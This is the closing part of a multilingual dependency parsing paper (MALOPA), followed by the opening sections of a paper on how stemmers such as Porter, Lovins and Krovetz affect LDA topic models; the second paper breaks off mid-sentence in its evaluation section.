and we use gold coarse POS tags. Our parser uses the same word embeddings and word clusters used in Guo et al. (2016), and does not use any typology information.30 The results in Table 8 show that, on average, our parser outperforms both baselines by more than 1 point in LAS, and gives the best LAS results in four (out of six) languages. 5 Related Work Our work builds on the model transfer approach, which was pioneered by Zeman and Resnik (2008) 29https://github.com/ryanmcd/uni-dep-tb/ 30In preliminary experiments, we found language embed- dings to hurt the performance of the parser for target languages without a treebank. 440 https://github.com/longdt219/universal_dependency_parser/tree/master/data/universal-dep/universal-dependencies-1.0 https://github.com/longdt219/universal_dependency_parser/tree/master/data/universal-dep/universal-dependencies-1.0 https://github.com/longdt219/universal_dependency_parser/tree/master/data/universal-dep/universal-dependencies-1.0 https://github.com/ryanmcd/uni-dep-tb/ LAS target language average de es fr it pt sv Zhang and Barzilay (2015) 54.1 68.3 68.8 69.4 72.5 62.5 65.9 Guo et al. (2016) 55.9 73.0 71.0 71.2 78.6 69.5 69.3 MALOPA 57.1 74.6 73.9 72.5 77.0 68.1 70.5 Table 8: Dependency parsing: labeled attachment scores (LAS) for multi-source transfer parsers in the simulated low-resource scenario where Lt ∩Ls = ∅. who trained a parser on a source language treebank then applied it to parse sentences in a target lan- guage. Cohen et al. (2011) and McDonald et al. (2011) trained unlexicalized parsers on treebanks of multiple source languages and applied the parser to different languages. Naseem et al. (2012), Täck- ström et al. (2013), and Zhang and Barzilay (2015) used language typology to improve model trans- fer. To add lexical information, Täckström et al. (2012) used multilingual word clusters, while Xiao and Guo (2014), Guo et al. (2015), Søgaard et al. (2015) and Guo et al. (2016) used multilingual word embeddings. Duong et al. (2015b) used a neural network based model, sharing most of the parame- ters between two languages, and used an `2 regular- izer to tie the lexical embeddings of translationally- equivalent words. We incorporate these ideas in our framework, while proposing a novel neural ar- chitecture for embedding language typology (see §3.4), and use a variant of word dropout (Iyyer et al., 2015) for consuming noisy structured inputs. We also show how to replace an array of mono- lingually trained parsers with one multilingually- trained parser without sacrificing accuracy, which is related to Vilares et al. (2016). Neural network parsing models which preceded Dyer et al. (2015) include Henderson (2003), Titov and Henderson (2007), Henderson and Titov (2010) and Chen and Manning (2014). Related to lexi- cal features in cross-lingual parsing is Durrett et al. (2012) who defined lexico-syntactic features based on bilingual lexicons. Other related work include Östling (2015), which may be used to induce more useful typological properties to inform multilingual parsing. Another popular approach for cross-lingual su- pervision is to project annotations from the source language to the target language via a parallel cor- pus (Yarowsky et al., 2001; Hwa et al., 2005) or via automatically-translated sentences (Tiedemann et al., 2014). Ma and Xia (2014) used entropy regu- larization to learn from both parallel data (with pro- jected annotations) and unlabeled data in the target language. Rasooli and Collins (2015) trained an array of target-language parsers on fully annotated trees, by iteratively decoding sentences in the tar- get language with incomplete annotations. One re- search direction worth pursuing is to find synergies between the model transfer approach and annotation projection approach. 6 Conclusion We presented MALOPA, a single parser trained on a multilingual set of treebanks. We showed that this parser, equipped with language embeddings and fine-grained POS embeddings, on average outper- forms monolingually-trained parsers for target lan- guages with a treebank. This pattern of results is quite encouraging. Although languages may share underlying syntactic properties, individual parsing models must behave quite differently, and our model allows this while sharing parameters across lan- guages. The value of this sharing is more pro- nounced in scenarios where the target language’s training treebank is small or non-existent, where our parser outperforms previous cross-lingual multi- source model transfer methods. Acknowledgments Waleed Ammar is supported by the Google fellow- ship in natural language processing. Miguel Balles- teros is supported by the European Commission un- der the contract numbers FP7-ICT-610411 (project MULTISENSOR) and H2020-RIA-645012 (project KRISTINA). Part of this material is based upon work supported by a subcontract with Raytheon 441 BBN Technologies Corp. under DARPA Prime Con- tract No. HR0011-15-C-0013, and part of this re- search was supported by a Google research award to Noah Smith. We thank Jiang Guo for sharing the multilingual word embeddings and multilingual word clusters. We thank Lori Levin, Ryan Mc- Donald, Jörg Tiedemann, Yulia Tsvetkov, and Yuan Zhang for helpful discussions. Last but not least, we thank the anonymous TACL reviewers for their valuable feedback. References Željko Agić, Maria Jesus Aranzabe, Aitziber Atutxa, Cristina Bosco, Jinho Choi, Marie-Catherine de Marn- effe, Timothy Dozat, Richárd Farkas, Jennifer Foster, Filip Ginter, Iakes Goenaga, Koldo Gojenola, Yoav Goldberg, Jan Hajič, Anders Trærup Johannsen, Jenna Kanerva, Juha Kuokkala, Veronika Laippala, Alessan- dro Lenci, Krister Lindén, Nikola Ljubešić, Teresa Lynn, Christopher Manning, Héctor Alonso Martínez, Ryan McDonald, Anna Missilä, Simonetta Monte- magni, Joakim Nivre, Hanna Nurmi, Petya Osenova, Slav Petrov, Jussi Piitulainen, Barbara Plank, Prokopis Prokopidis, Sampo Pyysalo, Wolfgang Seeker, Moj- gan Seraji, Natalia Silveira, Maria Simi, Kiril Simov, Aaron Smith, Reut Tsarfaty, Veronika Vincze, and Daniel Zeman. 2015. Universal dependencies 1.1. LINDAT/CLARIN digital library at the Institute of Formal and Applied Linguistics, Charles University in Prague. Waleed Ammar, George Mulcaire, Yulia Tsvetkov, Guil- laume Lample, Chris Dyer, and Noah A. Smith. 2016. Massively multilingual word embeddings. arXiv:1602.01925v2. Utsab Barman, Amitava Das, Joachim Wagner, and Jen- nifer Foster. 2014. Code mixing: A challenge for lan- guage identification in the language of social media. In EMNLP Workshop on Computational Approaches to Code Switching. Emily M. Bender. 2011. On achieving and evaluating language-independence in NLP. Linguistic Issues in Language Technology, 6(3):1–26. Sabine Buchholz and Erwin Marsi. 2006. CoNLL-X shared task on multilingual dependency parsing. In Proc. of CoNLL. Danqi Chen and Christopher Manning. 2014. A fast and accurate dependency parser using neural networks. In Proc. of EMNLP. Shay B. Cohen, Dipanjan Das, and Noah A. Smith. 2011. Unsupervised structure prediction with non-parallel multilingual guidance. In Proc. of EMNLP. Matthew S. Dryer and Martin Haspelmath, editors. 2013. WALS Online. Max Planck Institute for Evolutionary Anthropology, Leipzig. Long Duong, Trevor Cohn, Steven Bird, and Paul Cook. 2015a. Low resource dependency parsing: Cross- lingual parameter sharing in a neural network parser. In Proc. of ACL-IJCNLP. Long Duong, Trevor Cohn, Steven Bird, and Paul Cook. 2015b. A neural network model for low-resource uni- versal dependency parsing. In Proc. of EMNLP. Greg Durrett, Adam Pauls, and Dan Klein. 2012. Syn- tactic transfer using a bilingual lexicon. In Proc. of EMNLP. Chris Dyer, Miguel Ballesteros, Wang Ling, Austin Matthews, and Noah A. Smith. 2015. Transition- based dependency parsing with stack long short-term memory. In Proc. of ACL. Matt Gardner, Kejun Huang, Evangelos Papalexakis, Xiao Fu, Partha Talukdar, Christos Faloutsos, Nicholas Sidiropoulos, and Tom Mitchell. 2015. Translation in- variant word embeddings. In Proc. of EMNLP. Xavier Glorot and Yoshua Bengio. 2010. Understand- ing the difficulty of training deep feedforward neural networks. In Proc. of AISTATS. Alan Graves, Abdel-rahman Mohamed, and Geoffrey Hinton. 2013. Speech recognition with deep recurrent neural networks. In Proc. of ICASSP. Jiang Guo, Wanxiang Che, David Yarowsky, Haifeng Wang, and Ting Liu. 2015. Cross-lingual dependency parsing based on distributed representations. In Proc. of ACL. Jiang Guo, Wanxiang Che, David Yarowsky, Haifeng Wang, and Ting Liu. 2016. A representation learning framework for multi-source transfer parsing. In Proc. of AAAI. Ulrich Heid and Sybille Raab. 1989. Collocations in multilingual generation. In Proc. of EACL. James Henderson and Ivan Titov. 2010. Incremental sig- moid belief networks for grammar learning. Journal of Machine Learning Research, 11:3541–3570. James Henderson. 2003. Inducing history representa- tions for broad coverage statistical parsing. In Proc. of NAACL-HLT. Zhiheng Huang, Wei Xu, and Kai Yu. 2015. Bidi- rectional LSTM-CRF models for sequence tagging. arXiv:1508.01991. Rebecca Hwa, Philip Resnik, Amy Weinberg, Clara Cabezas, and Okan Kolak. 2005. Bootstrapping parsers via syntactic projection across parallel texts. Natural Language Engineering, 11(03):311–325. Mohit Iyyer, Varun Manjunatha, Jordan L. Boyd-Graber, and Hal Daumé. 2015. Deep unordered composi- tion rivals syntactic methods for text classification. In Proc. of ACL. 442 Marco Lui and Timothy Baldwin. 2012. langid.py: An off-the-shelf language identification tool. In Proc. of ACL. Xuezhe Ma and Fei Xia. 2014. Unsupervised depen- dency parsing with transferring distribution via paral- lel guidance and entropy regularization. In Proc. of ACL. Ryan McDonald, Slav Petrov, and Keith Hall. 2011. Multi-source transfer of delexicalized dependency parsers. In Proc. of EMNLP. Ryan McDonald, Joakim Nivre, Yvonne Quirmbach- Brundage, Yoav Goldberg, Dipanjan Das, Kuzman Ganchev, Keith Hall, Slav Petrov, Hao Zhang, Oscar Täckström, Claudia Bedini, Núria Bertomeu Castelló, and Jungmee Lee. 2013. Universal dependency anno- tation for multilingual parsing. In Proc. of ACL. Tomas Mikolov, Kai Chen, Greg Corrado, and Jeffrey Dean. 2013. Efficient estimation of word represen- tations in vector space. In Proc. of ICLR. Tahira Naseem, Regina Barzilay, and Amir Globerson. 2012. Selective sharing for multilingual dependency parsing. In Proc. of ACL. Joakim Nivre and Jens Nilsson. 2005. Pseudo-projective dependency parsing. In Proc. of ACL. Joakim Nivre, Johan Hall, Sandra Kubler, Ryan McDon- ald, Jens Nilsson, Sebastian Riedel, and Deniz Yuret. 2007. The CoNLL 2007 shared task on dependency parsing. In Proc. of CoNLL. Joakim Nivre, Željko Agić, Maria Jesus Aranzabe, Masayuki Asahara, Aitziber Atutxa, Miguel Balles- teros, John Bauer, Kepa Bengoetxea, Riyaz Ah- mad Bhat, Cristina Bosco, Sam Bowman, Giuseppe G. A. Celano, Miriam Connor, Marie-Catherine de Marneffe, Arantza Diaz de Ilarraza, Kaja Do- brovoljc, Timothy Dozat, Tomaž Erjavec, Richárd Farkas, Jennifer Foster, Daniel Galbraith, Filip Gin- ter, Iakes Goenaga, Koldo Gojenola, Yoav Gold- berg, Berta Gonzales, Bruno Guillaume, Jan Ha- jič, Dag Haug, Radu Ion, Elena Irimia, Anders Jo- hannsen, Hiroshi Kanayama, Jenna Kanerva, Simon Krek, Veronika Laippala, Alessandro Lenci, Nikola Ljubešić, Teresa Lynn, Christopher Manning, Cătălina Mărănduc, David Mareček, Héctor Martínez Alonso, Jan Mašek, Yuji Matsumoto, Ryan McDonald, Anna Missilä, Verginica Mititelu, Yusuke Miyao, Simon- etta Montemagni, Shunsuke Mori, Hanna Nurmi, Petya Osenova, Lilja Øvrelid, Elena Pascual, Marco Passarotti, Cenel-Augusto Perez, Slav Petrov, Jussi Piitulainen, Barbara Plank, Martin Popel, Prokopis Prokopidis, Sampo Pyysalo, Loganathan Ramasamy, Rudolf Rosa, Shadi Saleh, Sebastian Schuster, Wolf- gang Seeker, Mojgan Seraji, Natalia Silveira, Maria Simi, Radu Simionescu, Katalin Simkó, Kiril Simov, Aaron Smith, Jan Štěpánek, Alane Suhr, Zsolt Szántó, Takaaki Tanaka, Reut Tsarfaty, Sumire Uematsu, Lar- raitz Uria, Viktor Varga, Veronika Vincze, Zdeněk Žabokrtský, Daniel Zeman, and Hanzhi Zhu. 2015a. Universal dependencies 1.2. LINDAT/CLARIN digi- tal library at the Institute of Formal and Applied Lin- guistics, Charles University in Prague. Joakim Nivre, Cristina Bosco, Jinho Choi, Marie- Catherine de Marneffe, Timothy Dozat, Richárd Farkas, Jennifer Foster, Filip Ginter, Yoav Gold- berg, Jan Hajič, Jenna Kanerva, Veronika Laippala, Alessandro Lenci, Teresa Lynn, Christopher Manning, Ryan McDonald, Anna Missilä, Simonetta Monte- magni, Slav Petrov, Sampo Pyysalo, Natalia Silveira, Maria Simi, Aaron Smith, Reut Tsarfaty, Veronika Vincze, and Daniel Zeman. 2015b. Universal depen- dencies 1.0. LINDAT/CLARIN digital library at the Institute of Formal and Applied Linguistics, Charles University in Prague. Joakim Nivre. 2004. Incrementality in deterministic de- pendency parsing. In Proceedings of the Workshop on Incremental Parsing: Bringing Engineering and Cog- nition Together. Robert Östling. 2015. Word order typology through mul- tilingual word alignment. In Proc. of ACL-IJCNLP. Slav Petrov, Dipanjan Das, and Ryan McDonald. 2012. A universal part-of-speech tagset. In Proc. of LREC. Mohammad Sadegh Rasooli and Michael Collins. 2015. Density-driven cross-lingual transfer of dependency parsers. In Proc. of EMNLP. Deitmar Rösner. 1988. The generation system of the SEMSYN project: Towards a task-independent gener- ator for German. Advances in Natural Language Gen- eration, 2. Anders Søgaard, Željko Agić, Héctor Martínez Alonso, Barbara Plank, Bernd Bohnet, and Anders Johannsen. 2015. Inverted indexing for cross-lingual NLP. In Proc. of ACL-IJCNLP 2015. Nitish Srivastava, Geoffrey Hinton, Alex Krizhevsky, Ilya Sutskever, and Ruslan Salakhutdinov. 2014. Dropout: A simple way to prevent neural networks from overfitting. Journal of Machine Learning Re- search, 15(1):1929–1958. Ilya Sutskever, Oriol Vinyals, and Quoc V. Le. 2014. Sequence to sequence learning with neural networks. In NIPS. Oscar Täckström, Ryan McDonald, and Jakob Uszkoreit. 2012. Cross-lingual word clusters for direct transfer of linguistic structure. In Proc. of NAACL-HLT. Oscar Täckström, Dipanjan Das, Slav Petrov, Ryan Mc- Donald, and Joakim Nivre. 2013. Token and type constraints for cross-lingual part-of-speech tagging. Transactions of the Association for Computational Linguistics, 1:1–12. 443 Jörg Tiedemann, Zeljko Agic, and Joakim Nivre. 2014. Treebank translation for cross-lingual parser induc- tion. In Proc. of CoNLL. Jörg Tiedemann. 2015. Cross-lingual dependency pars- ing with universal dependencies and predicted POS la- bels. In Proc. of International Conference on Depen- dency Linguistics (Depling). Ivan Titov and James Henderson. 2007. Constituent parsing with incremental sigmoid belief networks. In Proc. of ACL. David Vilares, Carlos Gómez-Rodríguez, and Miguel A. Alonso. 2016. One model, two languages: Train- ing bilingual parsers with harmonized treebanks. arXiv:1507.08449v2. Wikipedia. 2016. List of languages by number of native speakers. http://bit.ly/1LUP5kJ. Accessed: 2016-01-26. Min Xiao and Yuhong Guo. 2014. Distributed word representation learning for cross-lingual dependency parsing. In Proc. of CoNLL. David Yarowsky, Grace Ngai, and Richard Wicentowski. 2001. Inducing multilingual text analysis tools via robust projection across aligned corpora. In Proc. of HLT. Daniel Zeman and Philip Resnik. 2008. Cross-language parser adaptation between related languages. In Proc. of IJCNLP. Yuan Zhang and Regina Barzilay. 2015. Hierarchical low-rank tensors for multilingual transfer parsing. In Proc. of EMNLP. 444 http://bit.ly/1LUP5kJ work_55utqx7tjrft5ojtbr67ypjdye ---- Comparing Apples to Apple: The Effects of Stemmers on Topic Models Alexandra Schofield Cornell University Ithaca, NY 14853 xanda@cs.cornell.edu David Mimno Cornell University Ithaca, NY 14853 mimno@cornell.edu Abstract Rule-based stemmers such as the Porter stem- mer are frequently used to preprocess English corpora for topic modeling. In this work, we train and evaluate topic models on a variety of corpora using several different stemming algo- rithms. We examine several different quantita- tive measures of the resulting models, includ- ing likelihood, coherence, model stability, and entropy. Despite their frequent use in topic modeling, we find that stemmers produce no meaningful improvement in likelihood and co- herence and in fact can degrade topic stability. 1 Introduction Stemming is a popular way to reduce the size of a vocabulary in natural language tasks by conflating words with related meanings. Specifically, stem- ming aims to convert words with the same “stem” or root (e.g “creative” and “creator”) to a single word type (“create”). Though originally developed in the context of information retrieval (IR) systems, stem- mers are now commonly used as a preprocessing step in unsupervised machine learning tasks. It this work we consider one such application, topic model- ing. Although stemmers are commonly used in topic models (Liu et al., 2010; Lo et al., 2015; Nan et al., 2015; Kamath S et al., 2015; Su, 2015; Jacobi et al., 2016), we find no empirical benefits for the practice. One could conjecture several reasons to stem for semantic models. First, conflating semanti- cally related words into one word type could im- prove model fit by intelligently reducing the space of possible models. Given that reducing the fea- ture space randomly is already known to be poten- tially beneficial (Ganchev and Dredze, 2008), do- ing so in a semantically-inspired way might be even better. Second, stemmers could reduce the effect of small morphological differences on the stability of a learned model. Reducing the words “happy”, “happily”, and “happier” to one token may result in fewer possible models with divergent “happy” top- ics. Third, stemmers approximate intuitive word equivalence classes, so language models based on stemmed corpora inherit that semantic similarity, which may improve interpretability as perceived by human evaluators. However, stemmers have the potential to be con- fusing, unreliable, and possibly even harmful in lan- guage models. First, many stemmers produce terms that are not recognizable English words and may be difficult to map back to a valid original word, such as “stai” as the Porter stem of “stay”. Sec- ond, although stemming aids document retrieval for many languages, English is a notorious exception (Harman, 1991). In English, the complexity of compound affixes with meaning can lead to over- stemming, such as “recondition,” a word sharing a stem but not a root meaning with “recondite.” These complexities can also lead to the incorrect conflation of words with the same root but divergent meaning such as “absolutely” and “absolution”. Third, and most troubling, there are cases in which morpholog- ical variants of the same stem carry significantly dif- ferent meanings. Conflating “apple” and “apples” is uncontroversial, but loses the distinction between a device manufacturer and a type of fruit. 287 Transactions of the Association for Computational Linguistics, vol. 4, pp. 287–300, 2016. Action Editor: Hal Daume III. Submission batch: 2/2016; Published 7/2016. c©2016 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. Topic modeling is sensitive to preprocessing be- cause of its dependence on a sparse vocabulary (Jockers and Mimno, 2013). In practice, however, preprocessing methods are typically neither detailed nor justified, leading to problems in reproducibility (Fokkens et al., 2013). We believe investigating the effects of stemming will inform researchers outside the core natural language processing community as to how to best preprocess their texts. While stemmers are used in topic modeling, we know of no analysis focused on their effect. We draw inspiration from prior studies of the effects of stemming for other tasks and models (Harman, 1991; Han et al., 2012; Jivani, 2011; Rani et al., 2015) to apply rule-based stemmers to a variety of corpora to test their effect on topic models. We evaluate the quantitative fit of the models generated and the qualitative differences between differently- stemmed corpora to investigate the effects each stemmer has on a corpus. We hope that these results help guide future researchers as to how to select and evaluate stemmers for a given task and corpus. 2 Background In this work we consider two categories of word nor- malization1 methods: rule-based stemmers, or stem- mers primarily reliant on rules converting one af- fix to another, and context-based methods, or strate- gies that use dictionaries and other contextual, in- flectional, and derivational information to infer the correct word root Jivani (2011). We omit several language-independent strategies of text normaliza- tion, including those using Markov chains (Melucci and Orio, 2003) and clustering (Majumder et al., 2007). These methods are corpus-specific and error- prone, and we have not observed their use in topic modeling. In our evaluation, we consider nine different methods of word normalization, given below with two-letter labels. In addition to including popu- lar rule-based stemmers, we choose several sim- ple stemmers that are stronger and weaker than the named stemmers, where strength refers to how much the vocabulary is reduced. We will sometimes use 1Other methods for word normalization include case folding and replacing classes of tokens with a constant (e.g. NUMBER for numerals). the more general term conflation treatment or sim- ply treatment to refer to these methods with respect to our corpus. These are compared to the control, no-stemmer treatment, NS. 2.1 Rule-Based Treatments The first category, rule-based stemmers, includes methods primarily governed by a set of rules that convert one affix to another. Most classic stemmers fit into this category, including the famous Porter stemmer. These methods are quick, but also limited: no concise rule set captures every English morpho- logical exception, and these stemmers cannot use context to resolve ambiguous word types. They also are deterministic and consistent for each token: if word type A maps to stem B in one location, it will do so in every location word type A arises. Treat- ments of this type therefore are effectively equiva- lence relations over untreated words, with a confla- tion class being an equivalence class of word types under a conflation treatment t. While Jivani (2011) refers to these as “truncation stemmers” or “affix removal stemmers,” we find this naming confusing: stemmers rarely strictly truncate, and almost all stemmers aim to remove affixes. The core similarity of these methods is that all of the language-specific information used in these stem- mers is encoded directly into the rules they apply. Truncation Stemmers. k-truncation stemmers (Bhamidipati and Pal, 2007) remove all but the first k characters of a word. As a naı̈ve, high-strength method, they serve as a good baseline for the rela- tive effects of simple vocabulary reduction. We test four-truncation (T4) and five-truncation (T5). Five- truncation has strength close to a strong rule-based stemmer; levels below four are incoherent. “S” Stemmer. The S-removal stemmer or “S” stemmer (SS) removes S-based endings using only three rules. Harman (1991) introduces the “S” stem- ming algorithm as a weaker and simpler counter- point to more standard rule-based stemmers. As the rules are simple and good representatives of the types of rules employed by the other stemmers in this section, we include them in Table 1. Lovins Stemmer. The Lovins stemmer (LS) is a rule-based stemmer using a two-step stemming al- gorithm (Lovins, 1968). These steps use long lists of rules, but the method is still fast and simple to imple- 288 If word ends with: . . . and does not end with: . . . replace ending with: -ies -aies, -eies -y -es -aes, -ees, -oes -e -s -ss, -us - Table 1: The “S” stemmer of Harman (1991) consists of three simple rules in order. Only the first rule applicable in the first column is applied. ment and is generally considered a strong stemmer. Porter and Porter2 Stemmers. The Porter stem- mer (Porter, 1980), one of the most popular in cur- rent use, is a slightly less strong and more intricate stemmer than Lovins’. It uses five phases of rules and conditions that match patterns of vowel and con- sonant sequences. Porter later created a slightly im- proved version of the Porter stemmer for Snowball, a programming language for rule-based stemmers (Porter, 2001). We use both the original stemmer (P1) and the new version (P2) in our evaluation. Paice/Husk Stemmer. The Paice/Husk stemmer (PH), or Lancaster stemmer, iterates indefinitely over the same rule list, with some rules only ap- plying to unmodified words and others terminating iteration (Paice, 1990). While slightly more com- plicated in rule structure, the Paice/Husk stemmer is similar to the Lovins stemmer in strength. 2.2 Context-Based Treatments While the methods above are fast, they are impre- cise, as a limited set of rules cannot account for all possible morphological exceptions. Subtleties such as the difference between “frosting” windows and cake “frosting” are lost without contextual informa- tion. The methods below use tools such as dictio- naries, inflectional analysis, and part-of-speech in- ference to determine the correct conflated form of a word. As such, they may not consistently reduce the same word type to the same form. However, these tools also demand more computational resources; for our data, lemmatizing the corpus took more com- putational time than training the topic model. Krovetz Stemmer. The Krovetz stemmer (Krovetz, 1993) uses inflectional analysis and a dic- tionary to determine correct forms of words before removing word endings. This process is complex, but the stemmer itself is weak, as it aims less at conflating words with different parts of speech than normalizing verb forms and removing pluralization. The dictionary itself is crucial for implementation; for our Krovetz stemmer treatment (KS), we use the Lemur Project implementation. Lemmatizer. Lemmatizers use a database of lem- mas, or standardized word forms, in order to find the best normalized word form for a given token. While the method is orders of magnitude slower than rule-based stemmers, it is also much more princi- pled and extremely unlikely to over-conflate. We use the WordNet-based lemmatizer (WL) implemented in the Natural Language ToolKit (Bird et al., 2009) along with a Stanford POS Tagger (Toutanova et al., 2003) on the unmodified text to provide auxiliary part-of-speech information for the lemmatizer. 3 Model and Data In this paper, we focus on modeling topics in English datasets using Latent Dirichlet Allocation (LDA), a generative model for documents based upon their topics (Blei et al., 2003). A topic φ in this context is a multinomial probability distribution over words, without any embedded semantic model of how the words are connected. In LDA, each document has a multinomial distribution θ over topics; a document d is generated by choosing a number of words, and for each word first sampling a topic k from θd, then a word w from the distribution over words φk asso- ciated with topic k. The name Latent Dirichlet Allocation comes from the assumptions that information about each word’s topic or the original distributions θ and φ is latent (i.e. unobserved) and that the topic and word dis- tributions θ and φ are drawn from Dirichlet distri- butions: θ ∼ Dir(α), and φ ∼ Dir(β). Using this model, one can attempt to infer the most likely topics to generate a corpus for some preset number of topics K. However, the optimization problem is non-convex and intractable to solve analytically, and is thus generally solved using iterative techniques such as Gibbs sampling, expectation maximization, or variational inference. The resulting topics fre- quently display themes within the common words in a topic that can be used for classification, search, and recommendation systems. Because stemming affects the vocabulary distri- 289 bution of a corpus, the optimal parameters of topic model inference will vary depending on treatment. We us adaptive optimization of both Dirichlet hy- perparameters α and β. We use an asymmetric α and symmetric β to obtain the best model fit in ac- cordance with Wallach et al. (2009). In order to test the various word normalization treatments, we used an existing Python library for the Lovins, Paice/Husk, and both Porter algorithms (Chaput, 2010), modified to correct errors in im- plementation. We implemented our own trunca- tion stemmers and S-removal stemmer. We applied each stemmer to each word token in four corpora: articles from ArXiv in early 2015,2 articles from The New York Times in 2007 (Sandhaus, 2008), bi- ographies from IMDb,3 and reviews from the Yelp Dataset Challenge.4 Corpora were partitioned into 75% training documents, 25% test documents and lower-cased before conflation, which was performed per-sentence on lower-cased text. After treatment, we remove stopwords, digits, and punctuation. Ta- ble 2 shows details of the corpora, and Table 3 shows examples of each treatment.5 We train topic models using MALLET (McCallum, 2002) for K = 10, 50, and 200, with at least nine models for each corpus, treatment, and K combination. Training Data Evaluation Data Corpus # docs # toks # docs # toks ArXiv articles 17.1K 58.4M 5.7 K 19.5M IMDb bios 84.6K 9.13M 28.2K 3.05M NYT articles 29.4K 8.81M 9.79K 2.98M Yelp reviews 844K 43.1M 281K 14.4M Table 2: Training and test corpora represent considerable variance in content, size of corpus, average length of doc- ument, and proportion of training to test data. 4 Evaluations In order to evaluate the differences between confla- tion treatments of these corpora, we want to look at a variety of different types of evaluation of topic models. Unfortunately, as described later, standard 2Retrieved from ArXiv (http://www.arxiv.org). 3Courtesy of IMDb (http://www.imdb.com). 4Retrieved from Yelp (http://www.yelp.com/ dataset_challenge). 5Our code can be found at https://github.com/ heraldicsandfox/stemmers. evaluations of topic quality such as held-out likeli- hood and coherence are implicitly affected by the size of the vocabulary. To be able to compare dif- ferent treatments without simply favoring the maxi- mum possible vocabulary reduction, we create mod- ified versions of several existing classic evaluations as well as new metrics for understanding differences in models at the level of word types instead of topics. 4.1 Held-Out Likelihood Strong stemmers can improve the joint probability of documents occurring without improving the qual- ity of the model. As we reduce the size of the vo- cabulary, each topic-word distribution is spread over fewer possible words; at its extreme, the probabil- ity of any corpus under a zero-truncation stemmer would be 1.0. Experiments confirmed that for these treatments, the standard held-out likelihood score L of the test corpus based on the trained model ordered stemmers by how much they reduce the vocabulary, assigning the highest likelihood to those treatments with the smallest vocabularies. To account for the likelihood improvement caused by reducing vocabulary size, we normalize a model with K topics by the likelihood of a smoothed un- igram language model with the same β parameter. We calculate from the normalized log likelihood Lnorm a per-token metric PTLLnorm to put corpora of different lengths on a comparable scale. We com- pute the unigram model probability as a smoothed multinomial with prior β, number of instances of word type w in a corpus nw, vocabulary size W and total token count N: Lunigram = ∏ j ∏ i nwij + β N + Wβ (1) Lnorm = L/Lunigram (2) PTLLnorm = log(Lnorm) N = logL N − log(Lunigram) N . (3) Our resulting metric measures how much on aver- age the introduction of multiple topics improves the probability of each token occurring. 4.2 Topic Coherence Though log likelihood describes the statistical like- lihood of the topic model generating the corpus, it 290 http://www.arxiv.org http://www.imdb.com http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge https://github.com/heraldicsandfox/stemmers https://github.com/heraldicsandfox/stemmers Original This location does not have good service. Went through drive-through and they forgot our drinks and our sides. While they were preparing what they forgot, we could see another girl who had her back to us and it was obvious that she was on her phone. Any other KFC would be better. Tokenized this location does not have good service went through drive through and they forgot our drinks and our sides while they were preparing what they forgot we could see another girl who had her back to us and it was obvious that she was on her phone any other kfc would be better Stopped location good service drive forgot drinks sides preparing forgot girl back obvious phone kfc NS location good service drive forgot drinks sides preparing forgot girl back obvious ... T4 loca good serv driv forg drin side prep forg girl back obvi ... T5 locat good servi drive forgo drink sides prepa forgo girl back obvio ... LO loc good servic dr forgot drink sid prepar forgot girl back obv ... P1 locat good servic drive forgot drink side prepar forgot girl back obviou ... P2 locat good servic drive forgot drink side prepar forgot girl back obvious ... PH loc good serv driv forgot drink sid prep forgot girl back obvy ... SS location good service drive forgot drink side preparing forgot girl back obvious ... KR location good service drive forgot drink side prepare forgot girl back obvious ... WL location good service drive forget drink side prepare forget girl back obvious ... Table 3: A demonstration of the steps of preprocessing on a Yelp review. does not necessarily indicate topics that are seman- tically coherent to a human observer. To measure this, we use the topic coherence measure proposed by Mimno et al. (2011). This metric is defined for a given topic k and a list of the top M words of a topic vk1, . . .v k M as C(k) = M∑ m=2 m−1∑ l=1 log D(vl,vm) + β D(vl) + β (4) where D(vl) is the number of documents in which word vl occurs and D(vl,vm) is the number of doc- uments in which both words vl and vm occur. This metric is similar to pointwise mutual information Lau et al. (2014), but instead of using a sliding win- dow over the text to determine co-occurrence, it uses full documents as discrete windows. To avoid biasing towards the smaller vocabular- ies of stemmed datasets, we use the token-topic as- signments output by the topic model with the list of untreated tokens to produce untreated top keywords for each topic. We then use the original untreated corpus and these new keywords to compute coher- ence values. This allows us to observe whether con- flation treatments map tokens to the same topic in a more coherent way than untreated corpora would. We experimented with using Wikipedia as a refer- ence corpus, but found it too general a reference for a semantic model in a narrow context such as a sci- entific paper or an actor biography. 4.3 Clustering Consistency If we treat topic models as clusterings of tokens, we can evaluate how consistent those clusters are. Variation of information (VOI), a symmetric mea- surement of difference between clusterings, allows us to evaluate how much of a difference stemming makes in the topics formed (Meilă, 2003; Grimmer and King, 2011). Although some degree of vari- ation is inevitable between different trials with the same treatment due to randomness in the inference algorithm, stemming may affect how much occurs. We use two VOI-based metrics to examine treatment stability and differences: intra-treatment VOI and inter-treatment VOI. Intra-treatment VOI is VOI be- tween models trained with different random initial- izations but the same treatment. Correspondingly, inter-treatment VOI is the VOI between outputted topic assignments from different treatments. If the inter-treatment VOI is equal to the VOI between tri- als of the same treatment, we infer that the change in treatment has made a negligible difference in the assignment of tokens to topics. 4.4 Influential Words The metrics above are all summary statistics that measure different types of overall topic model qual- ity. However, to understand why these metrics are affected the way they are, we also need some way to examine the individual components we have af- fected: the word types available in our documents. 291 We use two heuristics to identify words that are most affected by a given treatment. The first uses inferred token probabilities in the test corpus. We want a scoring function of untreated word types that is positive if the estimated joint probability of to- kens of a particular pre-treatment type increases af- ter treatment, and negative if it decreases. We also want the magnitude of the score to correspond with both the difference in probability across all tokens and the relative informativeness of that token in dis- tinguishing documents or topics. For a given word type w from the untreated corpus and function t applying some conflation treatment, we compute the word type probability, TPwt, as D∑ d=1 Nd∑ i=1 I[xdi = w] log(P(t(xdi) = t(w)| . . . )), (5) where D is the number of documents, Nd is the number of tokens in document d, xdi is the untreated word type of token i in document d and t(xdi) is the treated type, I[xdi = w] is the indicator func- tion that is 1 if xdi = w and zero otherwise, and P(t(xdi) = t(w)| . . . ) is shorthand for the held- out likelihood estimate of treated token t(xdi) hav- ing the type w generated using the left-to-right tech- nique given the inferred parameters θ,φ and hyper- parameters α,β of the trained model. We average the quantity in Equation 5 across all topic models of the same corpus, topic count, and treatment to get TPwt. In order to compute a rela- tive score of the amount of probability improvement of an individual treatment for a word type from the no-stemmer treatment t0, we take the difference be- tween topic probabilities, weighted by inverse docu- ment frequency (idf) to favor words that are specific to particular documents. Our final score function is TPscorewt = (TPwt −TPwt0 ) log ( D Dw ) , (6) where Dw is the number of documents of the total D containing at least one token of type w. The lowest negative scores indicate higher probability and im- portance of the unstemmed form of the token, while high positive scores indicate higher 